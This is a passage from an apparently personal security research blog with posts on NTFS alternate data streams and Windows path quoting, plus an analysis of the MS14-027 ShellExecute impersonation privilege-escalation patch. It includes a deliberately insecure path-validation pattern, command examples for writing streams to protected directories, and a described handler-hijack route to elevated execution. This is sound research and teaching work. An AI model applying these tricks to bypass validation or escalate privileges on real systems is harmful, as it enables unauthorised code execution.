  cout << b.compare(c) << " " << strcmp(b.c_str(), c.c_str()) << endl;

  return 0;
}

Sometimes it pays just to sit down and think through seemingly tricky problems as they tend to be simpler than you imagine.

Thursday, 5 June 2014

Addictive Double-Quoting Sickness

Much as I'd love it if people who used "Scare Quotes" (see what I did there) were punished appropriately I doubt my intolerance is shared sufficiently amongst the general population. So this blog's not about that, but something security related which keeps on popping up, when it really shouldn't.

Still if I could be as loved as Mike Myers it might be worth using them myself. Wait...
This is a post about abusing ADS, but what I'm going to talk about is something I refer to as Domain-Specific Weirdness, at least when I'm bored and decide to make stuff up. The term refers to those bugs which are due to not understanding the differences between domain-specific representations. A far too common coding pattern you'll see on Windows in "Secure" systems (I really need help), is something like the following:
path = GetExecutablePath();

if(ValidAuthenticode(path)) {
    cmdline = '"' + path + '"';

    CreateProcess(NULL, cmdline, ...); 
}

The security issue appears when the executable path is influenced by untrusted code. The ValidateAuthenticode function verifies the file is signed by a specific certificate. Only if that passes will the executable be started. This hits so many bugs classes as it is, poor input validation, TOCTOU between the validation and process creation and also failing to pass the first argument to CreateProcess. But the sad thing is you see it in real software by real companies, even Microsoft.

Now to be fair the one thing the code does right is it ensures the path is double-quoted before passing it to CreateProcess. At least you won't get some hack hassling you for executing C:\Program.exe again. But process command lines and file paths are two completely different interpretation domains. CreateProcess pretty much follows how the standard C Runtime parses the process path. The CRT is open-source, so we can take a look at how the executable name is parsed out. In there you'll find the following comment (the file's stdargv.c if you're curious):
/* A quoted program name is handled here. The handling is much
   simpler than for other arguments. Basically, whatever lies
   between the leading double-quote and next one, or a terminal null
   character is simply accepted. Fancier handling is not required
   because the program name must be a legal NTFS/HPFS file name.
   Note that the double-quote characters are not copied, nor do they
   contribute to numchars. */
You've got to love how much MS still cares about OS/2. Except this is of course rubbish, the program name doesn't have to be a legal NTFS/HPFS file name in any way. Especially for CreateProcess. The rationale for ignoring illegal program names is because NTFS, like many file systems have a specific set of valid characters.

What's a valid NTFS file name you might ask? You can go look it up in MSDN, instead I put together a quick test case to find out.
#include <stdio.h>
#include <Windows.h>
#include <string>
 
int wmain(int argc, WCHAR* argv[])
{ 
    for (int i = 1; i < 65536; ++i)
    {
        std::wstring name = L".\a";  
        name += (WCHAR)i;
        name += L"a";  
 
        HANDLE hFile = CreateFile(name.c_str(), 
          GENERIC_READ | GENERIC_WRITE, FILE_SHARE_DELETE, NULL, 
          CREATE_ALWAYS, FILE_FLAG_DELETE_ON_CLOSE, NULL);

        if (hFile == INVALID_HANDLE_VALUE)
        {
            printf("Illegal Char: %d\n", i);
        }
        else
        {
            CloseHandle(hFile);
        }
    }
 
    return 0;
}
And it pretty much confirms MSDN, you can't use characters 1 through 31 (0 is implied), 32 (space) has some oddities and you can't use anything in <, >, :, \, ", \, /, |, ?, *. Notice the double-quote sitting there proud, in the middle.

Okay, let's get back to the point, what's this got to do with ADS? If you read this you'll find the following statement: "Any characters that are legal for a file name are also legal for the stream name, including spaces". If you read that and thought it meant that stream names have the same restrictions as file names in NTFS I have a surprise for you. Change the test case so instead of '.\a' we use '.\a:' we find that the only banned characters are, \, / and : quite a surprise. For our "bad" code we can now complete the circle of exploitation. You can pass a file name such as c:\abc\xyz:file" and the verification code will verify c:\abc\xyz:file" but actually execute c:\abc\xyz:file (subtle I know). And the crazy thing about this is there isn't even a way to escape it.

The moral of the story is this, you can never blindly assume that even a single interpretation domain works how you expect it to do, so when you mix domains together pain will likely ensue. This is also why Windows command line processing is so broken. At least *nix passes command line arguments separately, well unless you use something like system(3) (and for that you'll be punished). Making assumptions on the "validity" of a file path just seems inherently untrustworthy.

Tuesday, 27 May 2014

Abusive Directory Syndrome

As ever there's been some activity recently on Full Disclosure where one side believes something's a security vulnerability and the other says it's not. I'm not going to be drawn into that debate, but one interesting point did come up. Specifically that you can't create files in the root of the system drive (i.e. C:\) as a non-admin user, you can only create directories. Well this is both 100% true and false at the same time, it just depends what you mean by a "file" and who is asking at the time.

The title might give the game away, this is all to do with NTFS Alternate Data Streams (ADS). The NTFS file system supports multiple alternative data streams which can be assigned to a file, this can be used for storing additional attributes and data out-of-band. For example it is used by Internet Explorer to store the zone information for a downloaded file so the shell can warn you when you try to execute a file from Internet. Streams have names and are accessed using a special syntax, filename:streamname. You can easily create a data stream using the command prompt, type the following (in a directory you can write to):

echo Hello > abc
echo World! > abc:stm

more < abc  - Prints Hello
more < abc:stm - Prints World!

Easy no? Okay lets try it in the root of the system drive (obviously as a normal user):

echo Hello > c:\abc:stm - Prints Foxtrot Oscar
Oh well worth a try, but wait there's more...  One of the lesser known abilities of ADS, except to the odd Malware author, is you can also create streams on directories. Does this create new directories? Of course not, it creates file streams which you can access using file APIs. Let's try this again:

mkdir c:\abc
echo Fucking Awesome! > c:\abc:stm
more < c:\abc - File can't be found
more < c:\abc:stm - Prints Fucking Awesome!

Well we've created something which looks like a file to the Windows APIs, but is in the root of the system drive, something you're not supposed to be able to do. It seems deeply odd that you can:

  • Add an ADS to a directory, and 
  • The ADS is considered a file from the API perspective

Of course this doesn't help us exploit unquoted service paths, you can't have everything. Still when you consider the filename from a security perspective it has an interesting property, namely that its nominal parent in the hierarchy (when we're dealing with paths that's going to be what's separated by slashes) is C:\. A naive security verification process might assume that the file exists in a secure directory, leading to a security issue.

Take for example User Account Control (UAC), better know as the "Stop with the bloody security dialogs and let me get my work done" feature which was introduced in Vista. The service which controls this (Application Info) has the ability to automatically elevate certain executables, for controlling the UI (UIAccess) or to reduce the number of prompts you see. It verifies that the executables are in a secure directory such as c:\windows\system32 but specifically excludes writeable directories such as c:\windows\system32\tasks. But if you could write to Tasks:stm then that wouldn't be under the Tasks directory and so would be allowed? Well let's try it!

echo Hello > c:\windows\system32\tasks:stm
more < c:\windows\system32\tasks:stm - Access Denied :(

Why does it do that? We only have to take a look at the DACL to find out why, we have write access to Tasks but not read:

c:\>icacls c:\Windows\system32\tasks
c:\Windows\system32\tasks BUILTIN\Administrators:(CI)(F)
                          BUILTIN\Administrators:(OI)(R,W,D,WDAC,WO)
                          NT AUTHORITY\SYSTEM:(CI)(F)
                          NT AUTHORITY\SYSTEM:(OI)(R,W,D,WDAC,WO)
                          NT AUTHORITY\Authenticated Users:(CI)(W,Rc)
                          NT AUTHORITY\NETWORK SERVICE:(CI)(W,Rc)
                          NT AUTHORITY\LOCAL SERVICE:(CI)(W,Rc)
                          CREATOR OWNER:(OI)(CI)(IO)(F)

Oh well... Such is life. We've managed to create the stream but can't re-read it, awesome Write Only Memory. Still this does demonstrate something interesting, the DACL for the directory is applied to all the sub-streams even though the DACL might make little sense for file content. The directory DACL for Tasks doesn't allow normal users to read or list the directory, which means that you can't read or execute the file stream.

In conclusion all you need to be able to create an ADS on a directory is write access to the directory. This is normally so you can modify the contents of the directory but it also applies to creating streams. But the immediate security principal for a stream then becomes the parent directory which might not be as expected. If I find the time I might blog about other interesting abuses of ADS at a later date.

Wednesday, 21 May 2014

Impersonation and MS14-027

The recent MS14-027 patch intrigued me, a local EoP using ShellExecute. It seems it also intrigued others so I pointed out how it probably worked on Twitter but I hadn't confirmed it. This post is just a quick write up of what the patch does and doesn't fix. It turned out to be more complex than it first seemed and I'm not even sure it's correctly patched. Anyway, first a few caveats, I am fairly confident that what I'm presenting here is already known to some anyway. Also I'm not providing direct exploitation details, you'd need to find the actual mechanism to get the EoP working (at least to LocalSystem).

I theorized that the issue was due to mishandling of the registry when querying for file associations. Specifically the handling of HKEY_CLASSES_ROOT (HKCR) registry hive when under an impersonation token. When the ShellExecute function is passed a file to execute it first looks up the extension in the HKCR key. For example if you try to open a text file, it will try and open HKCR\.txt. If you know anything about the registry and how COM registration works you might know that HKCR isn't a real registry hive at all. Instead it's a merging of the keys HKEY_CURRENT_USER\Software\Classes and HKEY_LOCAL_MACHINE\Software\Classes. In most scenarios HKCU is taken to override HKLM registration as we can see in the following screenshot from Process Monitor (note PM records all access to HKLM classes as HKCR confusing the issue somewhat). 





When ShellExecute has read this registry key it tries to read a few values out it, most importantly the default value. The value of the default value represents a ProgID which determines how the shell handles the file extension. So for example the .txt extension is mapped to the ProgID 'txtfile'.

The ProgID just points ShellExecute to go reading HKCR/txtfile and we finally find what we're looking for, the shell verb registrations. The ShellExecute function also takes a verb parameter, this is the Action to perform on the file, so it could be print or edit but by far the most common one is open. There are many possible things to do here but one common action is to run another process passing the file path as an argument. As you can see below a text file defaults to being passed to NOTEPAD.

Now the crucial thing to understand here is that HKCU can be written to by a normal, unprivileged user. But HKCU is again a fake hive and is in fact just the key HKEY_USERS\SID where SID is replaced with the string SID of the current user (see pretty obvious, I guess). And even this isn't strictly 100% true when it comes to HKCR but it's close enough. Anyway, so what you might be asking? Well this is wonderful until user Impersonation gets involved. If a system or administrator process impersonates another user it's also suddenly finds when it accesses HKCU it really accesses the impersonated user's keys instead of its own. Perhaps this could lead to a system service that is  impersonating a user and then calls ShellExecute to start up the wrong handler for a file type leading to arbitrary execution at a higher privilege. 

With all this in mind lets take a look at patch in a bit more depth. The first step it to diff the patched binary with the original, sometimes easier said than done. I ran an unpatched and patched copies of shell32.dll through Patchdiff2 in IDA Pro which lead to a few interesting changes. In the function CAssocProgidElement::_InitFileAssociation a call was added to a new function CAssocProgidElement::SetPerMachineRootIfNeeded.


Digging into that revealed what the function was doing. If the current thread was impersonating another user and the current Session ID is 0 and the file extension being looked up is one a set of specific types the lookup is switched from HKCR to only HKLM. This seemed to confirm by suspicions that the patch targeted local system elevation (the only user on session 0 is likely to be LocalSystem or one of the service accounts) and it was related to impersonation.




Looking at the list of extension they all seemed to be executables (so .exe, .cmd etc.) so I knocked up a quick example program to test this out.


Running this program from a system account (using good old psexec -s) passing it the path to an executable file and the process ID of one of my user processes (say explorer.exe) I could see in process monitor it's reading the corresponding HKCU registry settings.








Okay so a last bit of exploitation is necessary I guess :) If you now register your own handler for the executable ProgID (in this case cmdfile), then no matter what the process executes it will instead run code of the attacker's choosing at what ever privilege the caller has. This is because Impersonation doesn't automatically cross to new processes, you need to call something special like CreateProcessFromUser to do that.


So how's it being exploited in the real world? I can't say for certain without knowing the original attack vector (and I don't really have the time to go wading through all the system services looking for the bad guy, assuming it's even Microsoft's code and not a third party service). Presumably there's something which calls ShellExecute on an executable file type (which you don't control the path to) during impersonating another user.

Still is it fixed? One thing I'm fairly clear on is there seems to still be a few potential attack vectors. This doesn't seem to do anything against an elevated admin user's processes being subverted. If you register a file extension as the unprivileged user it will get used by an admin process for the same user. This is ultimately by design, otherwise you would get inconsistent behaviour in elevated processes. The fix is only enabled if the current thread is impersonating and it's in session 0 (i.e. system services), and it's only enabled for certain executable file types.

This last requirement might seem odd, surely this applies to any file type? Well it does in a sense, however the way ShellExecute works is if the handling of the file type might block it runs the processing asynchronously in a new thread. Just like processes, threads don't inherit impersonation levels so the issue goes away. Turns out about the only thing it treats synchronously are executables. Well unless anyone instead uses things like FindExecutable or AssocQueryString but I digress ;-) And in my investigation I found some other stuff which perhaps I should send MS's way, let's hope I'm not too lazy to do so.